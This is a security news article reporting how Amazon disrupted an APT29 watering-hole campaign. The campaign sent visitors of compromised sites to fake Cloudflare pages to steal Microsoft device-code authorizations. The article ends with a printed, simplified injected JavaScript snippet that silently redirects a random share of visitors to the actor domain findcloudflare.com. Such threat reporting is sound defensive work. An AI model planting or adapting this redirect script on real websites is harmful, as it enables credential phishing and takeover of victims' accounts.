Amazon\u2019s threat intelligence team uncovered a sophisticated watering hole campaign in late August 2025, which is orchestrated by APT29, also known as Midnight Blizzard, a Russian Foreign Intelligence Service\u2013linked actor.<\/p>\n
The operation relied on the compromise of legitimate websites to redirect unsuspecting visitors to malicious infrastructure.<\/p>\n
Once redirected, users encountered counterfeit Cloudflare verification pages designed to harvest credentials and trick victims into authorizing attacker-controlled devices through Microsoft\u2019s device code authentication flow.<\/p>\n
The campaign\u2019s breadth was striking: approximately 10 percent of site visitors were siphoned off to actor-controlled domains such as findcloudflare[.]com and cloudflare.redirectpartners[.]com.<\/p>\n
These domains mimicked official security checks so convincingly that many users failed to detect the ruse.<\/p>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi_y9HIHNh4aO99cTTkcNvzPdUTiW4U0VbrWy538HJXsoaXKQzdAAHCsyL8EBVbMOFmGzlRgjpgeSmlzoL38y1aEHBC7bgUqvKqp15r2q_Ort9-g3HZdUMaOLEg8PzHJmY2KGuNRZsThPhZJXL61efP0JD7wpD1bBw_PwUWCz7glNA3cUSy-RKyGUG-REA\/s16000\/Image%2520of%2520compromised%2520page%2C%2520with%2520domain%2520name%2520removed%2520%28Source%2520-%2520Amazon%29.webp?ssl=1\")
Amazon analysts noted<\/a> that this approach marked a significant evolution in APT29\u2019s tradecraft. Instead of relying solely on phishing emails or targeted spear-phishing, the group employed opportunistic injection of obfuscated JavaScript into compromised sites.<\/p>\n This tactic broadened their potential victim pool by embedding malicious redirects directly into popular web pages<\/a>.<\/p>\n Visitors were often unaware they were being rerouted until prompted to enter device codes or approve new device authorizations\u2014actions that granted the threat actor persistent access.<\/p>\n The impact of this campaign extended beyond mere credential theft<\/a>. By integrating with Microsoft\u2019s device code authentication, APT29 could persist within corporate environments, leveraging authorized sessions to move laterally and gather intelligence.<\/p>\n Although no AWS systems were compromised, the incident underscored the persistent threat posed by state-sponsored actors adapting their methods to evade traditional defenses.<\/p>\n Amazon worked rapidly with Cloudflare, Microsoft, and other providers to dismantle the malicious domains and isolate compromised EC2 instances, illustrating the power of coordinated industry response.<\/p>\n A closer look at the injected script reveals several advanced evasion techniques. The JavaScript payload was base64-encoded to mask its true purpose, and randomization logic redirected only a subset of visitors, reducing the likelihood of detection.<\/p>\n Once decoded, the snippet performed a server-side redirect to the fraudulent authentication<\/a> page while setting cookies to prevent repeated redirects of the same user. A simplified version of the decoded code appears below:-<\/p>\n This snippet exemplifies APT29\u2019s shift from client-side to server-side redirects when previous infrastructure was disrupted.<\/p>\n By rapidly migrating to new domains and refining their code, the group sustained their campaign despite ongoing takedowns.<\/p>\n Amazon\u2019s successful disruption of this infrastructure highlights the necessity for continuous monitoring of web-based threats and collaboration across the security community.<\/p>\n The post Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nTechnical Overview of Obfuscated JavaScript<\/strong><\/h2>\n
(function(){\n var uid = Math.random().toString(36).substring(2);\n if (!document.cookie.includes('redir='+uid) && Math.random()<0.1) {\n document. Cookie = 'redir='+uid+';path=\/';\n window.location.replace('https:\/\/findcloudflare.com\/device\/code?auth=' + uid);\n }\n})();<\/code><\/pre>\nBoost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n